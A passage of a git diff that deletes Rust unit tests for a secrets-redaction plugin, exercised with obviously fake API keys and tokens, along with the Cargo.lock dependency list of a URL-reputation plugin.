"private_key_block")); - assert!(redacted.contains("***REDACTED***")); - } - - #[test] - fn test_detect_and_redact_jwt() { - let mut cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - cfg.enabled.insert("jwt_like".to_string(), true); - - let text = "Authorization: Bearer eyJfake_header_12345.eyJfake_payload_1234.fake_signature_12345678"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(!findings.is_empty()); - assert!(findings.iter().any(|f| f.pii_type == "jwt_like")); - assert!(redacted.contains("***REDACTED***")); - } - - #[test] - fn test_detect_and_redact_preview_truncation() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - let text = "Key: AKIAFAKE12345EXAMPLE"; - let (findings, _) = detect_and_redact(text, &cfg); - - assert!(!findings.is_empty()); - let finding = &findings[0]; - assert_eq!(finding.preview, "AKIAFAKE…"); - assert_eq!(finding.preview.chars().count(), 9); // 8 chars + ellipsis - } - - #[test] - fn test_detect_and_redact_short_preview() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - // Create a pattern that matches short strings - let text = "token=xoxr-fake"; - let (findings, _) = detect_and_redact(text, &cfg); - - // If any findings, check preview handling - for finding in findings { - assert!(finding.preview.len() <= 9); - } - } - - #[test] - fn test_finding_clone() { - let finding = Finding { - pii_type: "test".to_string(), - preview: "preview".to_string(), - }; - - let cloned = finding.clone(); - assert_eq!(finding.pii_type, cloned.pii_type); - assert_eq!(finding.preview, cloned.preview); - } - - #[test] - fn test_finding_debug() { - let finding = Finding { - pii_type: "aws_key".to_string(), - preview: "AKIA…".to_string(), - }; - - let debug_str = format!("{:?}", finding); - assert!(debug_str.contains("aws_key")); - assert!(debug_str.contains("AKIA")); - } - - #[test] - fn test_detect_and_redact_short_match() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - // Test with a short match (less than 8 chars) - let text = "key=abc123"; - let (findings, _) = detect_and_redact(text, &cfg); - - // Check that short previews don't get truncated - for finding in findings { - if finding.preview.len() <= 8 { - assert!(!finding.preview.contains('…')); - } - } - } - - #[test] - fn test_scan_container_string_direct() { - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "[REDACTED]".to_string(), - ..Default::default() - }; - - // Test the string extraction path in scan_container - let text = "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert_eq!(findings.len(), 1); - assert!(redacted.contains("[REDACTED]")); - assert!(!redacted.contains("AKIAFAKE12345EXAMPLE")); - } - - #[test] - fn test_scan_container_dict_logic() { - // Test dict iteration logic by simulating what scan_container does - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "***".to_string(), - ..Default::default() - }; - - // Simulate processing multiple dict values - let values = vec![ - "AKIAFAKE12345EXAMPLE", - "normal text", - "xoxr-fake-000000000-fake000000000-fakefakefakefake", - ]; - - let mut total_count = 0; - let mut all_findings = Vec::new(); - - for value in values { - let (findings, _redacted) = detect_and_redact(value, &cfg); - total_count += findings.len(); - all_findings.extend(findings); - } - - assert!(total_count >= 2, "Should detect at least 2 secrets"); - assert!(all_findings.len() >= 2); - } - - #[test] - fn test_scan_container_list_logic() { - // Test list iteration logic - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "[X]".to_string(), - ..Default::default() - }; - - let items = vec![ - "AKIAFAKE12345EXAMPLE", - "normal text", - "AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345", - ]; - - let mut total_count = 0; - let mut redacted_items = Vec::new(); - - for item in items { - let (findings, redacted) = detect_and_redact(item, &cfg); - total_count += findings.len(); - redacted_items.push(redacted); - } - - assert!(total_count >= 2, "Should detect at least 2 secrets"); - assert_eq!(redacted_items.len(), 3); - assert!(redacted_items[0].contains("[X]")); - assert_eq!(redacted_items[1], "normal text"); - } - - #[test] - fn test_scan_container_nested_structure() { - // Test nested structure processing - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - // Simulate nested dict: outer -> inner -> secret - let secret_text = "AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(secret_text, &cfg); - - assert_eq!(findings.len(), 1); - assert!(redacted.contains("***REDACTED***")); - } - - #[test] - fn test_scan_container_empty_containers() { - let cfg = SecretsDetectionConfig::default(); - - // Empty string - let (findings, redacted) = detect_and_redact("", &cfg); - assert_eq!(findings.len(), 0); - assert_eq!(redacted, ""); - - // String with no secrets - let (findings, redacted) = detect_and_redact("just normal text", &cfg); - assert_eq!(findings.len(), 0); - assert_eq!(redacted, "just normal text"); - } - - #[test] - fn test_scan_container_multiple_findings() { - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - let text = - "Key: AKIAFAKE12345EXAMPLE Token: xoxr-fake-000000000-fake000000000-fakefakefakefake"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(findings.len() >= 2, "Should detect at least 2 secrets"); - assert!(redacted.contains("***REDACTED***")); - - // Verify findings have required fields - for finding in &findings { - assert!(!finding.pii_type.is_empty()); - assert!(!finding.preview.is_empty()); - } - } - - #[test] - fn test_scan_container_no_redaction_mode() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - let text = "AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert_eq!(findings.len(), 1); - // Text should NOT be redacted when redact=false - assert_eq!(redacted, text); - } - - #[test] - fn test_scan_container_mixed_content() { - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - // Simulate processing mixed content (dict with list of strings) - let items = vec!["AKIAFAKE12345EXAMPLE", "safe text"]; - let mut total_findings = 0; - - for item in items { - let (findings, _) = detect_and_redact(item, &cfg); - total_findings += findings.len(); - } - - assert_eq!(total_findings, 1); - } - - #[test] - fn test_preview_generation() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - // Test long secret (should be truncated) - let long_text = "AKIAFAKE12345EXAMPLE"; - let (findings, _) = detect_and_redact(long_text, &cfg); - - if !findings.is_empty() { - let preview = &findings[0].preview; - // Preview should be truncated to 8 chars + ellipsis for strings > 8 chars - // The match is 20 chars, so it should be truncated - if long_text.len() > 8 { - assert!( - preview.contains('…'), - "Long preview should contain ellipsis" - ); - assert_eq!(preview.chars().count(), 9); // 8 chars + ellipsis - } - } - } - - #[test] - fn test_findings_accumulation() { - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - // Test that findings accumulate correctly across multiple values - let secrets = vec![ - "AKIAFAKE12345EXAMPLE", - "AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345", - "xoxr-fake-000000000-fake000000000-fakefakefakefake", - ]; - - let mut all_findings = Vec::new(); - for secret in secrets { - let (findings, _) = detect_and_redact(secret, &cfg); - all_findings.extend(findings); - } - - assert!(all_findings.len() >= 3, "Should accumulate all findings"); - } - - #[test] - fn test_detect_and_redact_pattern_disabled_via_config() { - let mut enabled = std::collections::HashMap::new(); - enabled.insert("aws_access_key_id".to_string(), false); - enabled.insert("google_api_key".to_string(), true); - - let cfg = SecretsDetectionConfig { - enabled, - redact: true, - redaction_text: "[X]".to_string(), - ..Default::default() - }; - - let text = "AWS: AKIAFAKE12345EXAMPLE Google: AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // AWS pattern is disabled, so it should not be detected - assert!(!findings.iter().any(|f| f.pii_type == "aws_access_key_id")); - // Google pattern is enabled, so it should be detected - assert!(findings.iter().any(|f| f.pii_type == "google_api_key")); - // AWS key should NOT be redacted (pattern disabled) - assert!(redacted.contains("AKIAFAKE12345EXAMPLE")); - // Google key SHOULD be redacted (pattern enabled) - assert!(!redacted.contains("AIzaFAKE_KEY_FOR_TEST")); - } - - #[test] - fn test_detect_and_redact_all_patterns_disabled() { - let mut enabled = std::collections::HashMap::new(); - for pattern_name in crate::patterns::PATTERNS.keys() { - enabled.insert(pattern_name.to_string(), false); - } - - let cfg = SecretsDetectionConfig { - enabled, - redact: true, - ..Default::default() - }; - - let text = "AKIAFAKE12345EXAMPLE AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // No patterns enabled, so no findings - assert_eq!(findings.len(), 0); - // Text should be unchanged - assert_eq!(redacted, text); - } - - #[test] - fn test_detect_and_redact_preview_length_boundary() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - // Test with a secret that's exactly 8 characters - let text_8 = "key=abcd1234"; - let (findings_8, _) = detect_and_redact(text_8, &cfg); - - // Test with a secret that's 9 characters (should be truncated) - let text_9 = "AKIAFAKE12345EXAMPLE"; - let (findings_9, _) = detect_and_redact(text_9, &cfg); - - // Verify preview handling for different lengths - for finding in findings_8 { - if finding.preview.len() <= 8 { - assert!( - !finding.preview.contains('…'), - "Short preview should not have ellipsis" - ); - } - } - - for finding in findings_9 { - if finding.preview.len() == 9 { - assert!( - finding.preview.contains('…'), - "Long preview should have ellipsis" - ); - } - } - } - - #[test] - fn test_detect_and_redact_unwrap_or_default_behavior() { - // Test the unwrap_or(false) behavior when pattern is not in enabled map - let mut enabled = std::collections::HashMap::new(); - // Only add one pattern, others will use default (false = disabled) - enabled.insert("aws_access_key_id".to_string(), false); - - let cfg = SecretsDetectionConfig { - enabled, - redact: true, - ..Default::default() - }; - - let text = "Google: AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // google_api_key is not in enabled map, so it should default to false (disabled) - assert!(!findings.iter().any(|f| f.pii_type == "google_api_key")); - assert!(!redacted.contains("***REDACTED***")); - } - - #[test] - fn test_detect_and_redact_multiple_matches_same_pattern() { - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "[REDACTED]".to_string(), - ..Default::default() - }; - - let text = "Key1: AKIAFAKE12345EXAMPLE Key2: AKIAFAKE67890EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // Should detect both AWS keys - let aws_findings: Vec<_> = findings - .iter() - .filter(|f| f.pii_type == "aws_access_key_id") - .collect(); - assert_eq!(aws_findings.len(), 2, "Should detect both AWS keys"); - - // Both should be redacted - assert!(!redacted.contains("AKIAFAKE12345EXAMPLE")); - assert!(!redacted.contains("AKIAFAKE67890EXAMPLE")); - assert_eq!(redacted.matches("[REDACTED]").count(), 2); - } - - #[test] - fn test_detect_and_redact_overlapping_patterns() { - let mut cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - cfg.enabled.insert("hex_secret_32".to_string(), true); - cfg.enabled.insert("base64_24".to_string(), true); - - // A base64 string that might also match hex pattern - let text = "secret=SGVsbG8gV29ybGQgdGhpcyBpcyBhIGxvbmcgYmFzZTY0IGVuY29kZWQgc3RyaW5n"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // Should detect at least one pattern - assert!(!findings.is_empty()); - // Should be redacted - assert!(redacted.contains("***REDACTED***")); - } - - #[test] - fn test_detect_and_redact_empty_enabled_map() { - let cfg = SecretsDetectionConfig { - enabled: std::collections::HashMap::new(), - redact: true, - ..Default::default() - }; - - let text = "AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // With empty enabled map, unwrap_or(false) should disable all patterns - assert!(findings.is_empty()); - assert!(!redacted.contains("***REDACTED***")); - } - - #[test] - fn test_finding_struct_fields() { - let finding = Finding { - pii_type: "test_type".to_string(), - preview: "test_preview".to_string(), - }; - - assert_eq!(finding.pii_type, "test_type"); - assert_eq!(finding.preview, "test_preview"); - } - - #[test] - fn test_detect_and_redact_redaction_text_variations() { - let test_cases = vec![ - ("[REDACTED]", "[REDACTED]"), - ("***", "***"), - ("", ""), - ("", ""), // Empty redaction text - ]; - - for (redaction_text, expected) in test_cases { - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: redaction_text.to_string(), - ..Default::default() - }; - - let text = "AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(!findings.is_empty()); - if !expected.is_empty() { - assert!(redacted.contains(expected)); - } - assert!(!redacted.contains("AKIAFAKE12345EXAMPLE")); - } - } -} diff --git a/plugins_rust/url_reputation/Cargo.lock b/plugins_rust/url_reputation/Cargo.lock deleted file mode 100644 index c2d51f0d88..0000000000 --- a/plugins_rust/url_reputation/Cargo.lock +++ /dev/null @@ -1,1089 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "aho-corasick" -version = "1.1.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301" -dependencies = [ - "memchr", -] - -[[package]] -name = "alloca" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a7d05ea6aea7e9e64d25b9156ba2fee3fdd659e34e41063cd2fc7cd020d7f4" -dependencies = [ - "cc", -] - -[[package]] -name = "anes" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" - -[[package]] -name = "anstyle" -version = "1.0.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "940b3a0ca603d1eade50a4846a2afffd5ef57a9feac2c0e2ec2e14f9ead76000" - -[[package]] -name = "arc-swap" -version = "1.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9f3647c145568cec02c42054e07bdf9a5a698e15b466fb2341bfc393cd24aa5" -dependencies = [ - "rustversion", -] - -[[package]] -name = "autocfg" -version = "1.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" - -[[package]] -name = "bumpalo" -version = "3.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb" - -[[package]] -name = "cast" -version = "0.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37b2a672a2cb129a2e41c10b1224bb368f9f37a2b16b612598138befd7b37eb5" - -[[package]] -name = "cc" -version = "1.2.57" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a0dd1ca384932ff3641c8718a02769f1698e7563dc6974ffd03346116310423" -dependencies = [ - "find-msvc-tools", - "shlex", -] - -[[package]] -name = "cfg-if" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" - -[[package]] -name = "ciborium" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e" -dependencies = [ - "ciborium-io", - "ciborium-ll", - "serde", -] - -[[package]] -name = "ciborium-io" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757" - -[[package]] -name = "ciborium-ll" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9" -dependencies = [ - "ciborium-io", - "half", -] - -[[package]] -name = "clap" -version = "4.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b193af5b67834b676abd72466a96c1024e6a6ad978a1f484bd90b85c94041351" -dependencies = [ - "clap_builder", -] - -[[package]] -name = "clap_builder" -version = "4.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "714a53001bf66416adb0e2ef5ac857140e7dc3a0c48fb28b2f10762fc4b5069f" -dependencies = [ - "anstyle", - "clap_lex", -] - -[[package]] -name = "clap_lex" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8d4a3bb8b1e0c1050499d1815f5ab16d04f0959b233085fb31653fbfc9d98f9" - -[[package]] -name = "criterion" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "950046b2aa2492f9a536f5f4f9a3de7b9e2476e575e05bd6c333371add4d98f3" -dependencies = [ - "alloca", - "anes", - "cast", - "ciborium", - "clap", - "criterion-plot", - "itertools", - "num-traits", - "oorandom", - "page_size", - "plotters", - "rayon", - "regex", - "serde", - "serde_json", - "tinytemplate", - "walkdir", -] - -[[package]] -name = "criterion-plot" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8d80a2f4f5b554395e47b5d8305bc3d27813bacb73493eb1001e8f76dae29ea" -dependencies = [ - "cast", - "itertools", -] - -[[package]] -name = "crossbeam-deque" -version = "0.8.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51" -dependencies = [ - "crossbeam-epoch", - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-epoch" -version = "0.9.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e" -dependencies = [ - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-utils" -version = "0.8.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28" - -[[package]] -name = "crunchy" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5" - -[[package]] -name = "displaydoc" -version = "0.2.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "either" -version = "1.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" - -[[package]] -name = "fastrand" -version = "2.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be" - -[[package]] -name = "find-msvc-tools" -version = "0.1.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" - -[[package]] -name = "form_urlencoded" -version = "1.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cb4cb245038516f5f85277875cdaa4f7d2c9a0fa0468de06ed190163b1581fcf" -dependencies = [ - "percent-encoding", -] - -[[package]] -name = "half" -version = "2.7.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b" -dependencies = [ - "cfg-if", - "crunchy", - "zerocopy", -] - -[[package]] -name = "heck" -version = "0.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" - -[[package]] -name = "icu_collections" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4c6b649701667bbe825c3b7e6388cb521c23d88644678e83c0c4d0a621a34b43" -dependencies = [ - "displaydoc", - "potential_utf", - "yoke", - "zerofrom", - "zerovec", -] - -[[package]] -name = "icu_locale_core" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "edba7861004dd3714265b4db54a3c390e880ab658fec5f7db895fae2046b5bb6" -dependencies = [ - "displaydoc", - "litemap", - "tinystr", - "writeable", - "zerovec", -] - -[[package]] -name = "icu_normalizer" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5f6c8828b67bf8908d82127b2054ea1b4427ff0230ee9141c54251934ab1b599" -dependencies = [ - "icu_collections", - "icu_normalizer_data", - "icu_properties", - "icu_provider", - "smallvec", - "zerovec", -] - -[[package]] -name = "icu_normalizer_data" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7aedcccd01fc5fe81e6b489c15b247b8b0690feb23304303a9e560f37efc560a" - -[[package]] -name = "icu_properties" -version = "2.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "020bfc02fe870ec3a66d93e677ccca0562506e5872c650f893269e08615d74ec" -dependencies = [ - "icu_collections", - "icu_locale_core", - "icu_properties_data", - "icu_provider", - "zerotrie", - "zerovec", -] - -[[package]] -name = "icu_properties_data" -version = "2.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "616c294cf8d725c6afcd8f55abc17c56464ef6211f9ed59cccffe534129c77af" - -[[package]] -name = "icu_provider" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85962cf0ce02e1e0a629cc34e7ca3e373ce20dda4c4d7294bbd0bf1fdb59e614" -dependencies = [ - "displaydoc", - "icu_locale_core", - "writeable", - "yoke", - "zerofrom", - "zerotrie", - "zerovec", -] - -[[package]] -name = "idna" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b0875f23caa03898994f6ddc501886a45c7d3d62d04d2d90788d47be1b1e4de" -dependencies = [ - "idna_adapter", - "smallvec", - "utf8_iter", -] - -[[package]] -name = "idna_adapter" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3acae9609540aa318d1bc588455225fb2085b9ed0c4f6bd0d9d5bcd86f1a0344" -dependencies = [ - "icu_normalizer", - "icu_properties", -] - -[[package]] -name = "itertools" -version = "0.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186" -dependencies = [ - "either", -] - -[[package]] -name = "itoa" -version = "1.0.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "92ecc6618181def0457392ccd0ee51198e065e016d1d527a7ac1b6dc7c1f09d2" - -[[package]] -name = "js-sys" -version = "0.3.91" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b49715b7073f385ba4bc528e5747d02e66cb39c6146efb66b781f131f0fb399c" -dependencies = [ - "once_cell", - "wasm-bindgen", -] - -[[package]] -name = "libc" -version = "0.2.183" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5b646652bf6661599e1da8901b3b9522896f01e736bad5f723fe7a3a27f899d" - -[[package]] -name = "litemap" -version = "0.8.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6373607a59f0be73a39b6fe456b8192fcc3585f602af20751600e974dd455e77" - -[[package]] -name = "log" -version = "0.4.29" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" - -[[package]] -name = "memchr" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" - -[[package]] -name = "num-traits" -version = "0.2.19" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" -dependencies = [ - "autocfg", -] - -[[package]] -name = "once_cell" -version = "1.21.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50" - -[[package]] -name = "oorandom" -version = "11.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d6790f58c7ff633d8771f42965289203411a5e5c68388703c06e14f24770b41e" - -[[package]] -name = "page_size" -version = "0.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30d5b2194ed13191c1999ae0704b7839fb18384fa22e49b57eeaa97d79ce40da" -dependencies = [ - "libc", - "winapi", -] - -[[package]] -name = "percent-encoding" -version = "2.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9b4f627cb1b25917193a259e49bdad08f671f8d9708acfd5fe0a8c1455d87220" - -[[package]] -name = "phf" -version = "0.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c1562dc717473dbaa4c1f85a36410e03c047b2e7df7f45ee938fbef64ae7fadf" -dependencies = [ - "phf_macros", - "phf_shared", - "serde", -] - -[[package]] -name = "phf_generator" -version = "0.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "135ace3a761e564ec88c03a77317a7c6b80bb7f7135ef2544dbe054243b89737" -dependencies = [ - "fastrand", - "phf_shared", -] - -[[package]] -name = "phf_macros" -version = "0.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "812f032b54b1e759ccd5f8b6677695d5268c588701effba24601f6932f8269ef" -dependencies = [ - "phf_generator", - "phf_shared", - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "phf_shared" -version = "0.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e57fef6bc5981e38c2ce2d63bfa546861309f875b8a75f092d1d54ae2d64f266" -dependencies = [ - "siphasher", -] - -[[package]] -name = "plotters" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aeb6f403d7a4911efb1e33402027fc44f29b5bf6def3effcc22d7bb75f2b747" -dependencies = [ - "num-traits", - "plotters-backend", - "plotters-svg", - "wasm-bindgen", - "web-sys", -] - -[[package]] -name = "plotters-backend" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "df42e13c12958a16b3f7f4386b9ab1f3e7933914ecea48da7139435263a4172a" - -[[package]] -name = "plotters-svg" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51bae2ac328883f7acdfea3d66a7c35751187f870bc81f94563733a154d7a670" -dependencies = [ - "plotters-backend", -] - -[[package]] -name = "portable-atomic" -version = "1.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" - -[[package]] -name = "potential_utf" -version = "0.1.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b73949432f5e2a09657003c25bca5e19a0e9c84f8058ca374f49e0ebe605af77" -dependencies = [ - "zerovec", -] - -[[package]] -name = "proc-macro2" -version = "1.0.106" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "pyo3" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf85e27e86080aafd5a22eae58a162e133a589551542b3e5cee4beb27e54f8e1" -dependencies = [ - "libc", - "once_cell", - "portable-atomic", - "pyo3-build-config", - "pyo3-ffi", - "pyo3-macros", -] - -[[package]] -name = "pyo3-build-config" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bf94ee265674bf76c09fa430b0e99c26e319c945d96ca0d5a8215f31bf81cf7" -dependencies = [ - "target-lexicon", -] - -[[package]] -name = "pyo3-ffi" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "491aa5fc66d8059dd44a75f4580a2962c1862a1c2945359db36f6c2818b748dc" -dependencies = [ - "libc", - "pyo3-build-config", -] - -[[package]] -name = "pyo3-log" -version = "0.13.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "26c2ec80932c5c3b2d4fbc578c9b56b2d4502098587edb8bef5b6bfcad43682e" -dependencies = [ - "arc-swap", - "log", - "pyo3", -] - -[[package]] -name = "pyo3-macros" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f5d671734e9d7a43449f8480f8b38115df67bef8d21f76837fa75ee7aaa5e52e" -dependencies = [ - "proc-macro2", - "pyo3-macros-backend", - "quote", - "syn", -] - -[[package]] -name = "pyo3-macros-backend" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22faaa1ce6c430a1f71658760497291065e6450d7b5dc2bcf254d49f66ee700a" -dependencies = [ - "heck", - "proc-macro2", - "pyo3-build-config", - "quote", - "syn", -] - -[[package]] -name = "quote" -version = "1.0.45" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41f2619966050689382d2b44f664f4bc593e129785a36d6ee376ddf37259b924" -dependencies = [ - "proc-macro2", -] - -[[package]] -name = "rayon" -version = "1.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "368f01d005bf8fd9b1206fb6fa653e6c4a81ceb1466406b81792d87c5677a58f" -dependencies = [ - "either", - "rayon-core", -] - -[[package]] -name = "rayon-core" -version = "1.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22e18b0f0062d30d4230b2e85ff77fdfe4326feb054b9783a3460d8435c8ab91" -dependencies = [ - "crossbeam-deque", - "crossbeam-utils", -] - -[[package]] -name = "regex" -version = "1.12.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276" -dependencies = [ - "aho-corasick", - "memchr", - "regex-automata", - "regex-syntax", -] - -[[package]] -name = "regex-automata" -version = "0.4.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f" -dependencies = [ - "aho-corasick", - "memchr", - "regex-syntax", -] - -[[package]] -name = "regex-syntax" -version = "0.8.10" 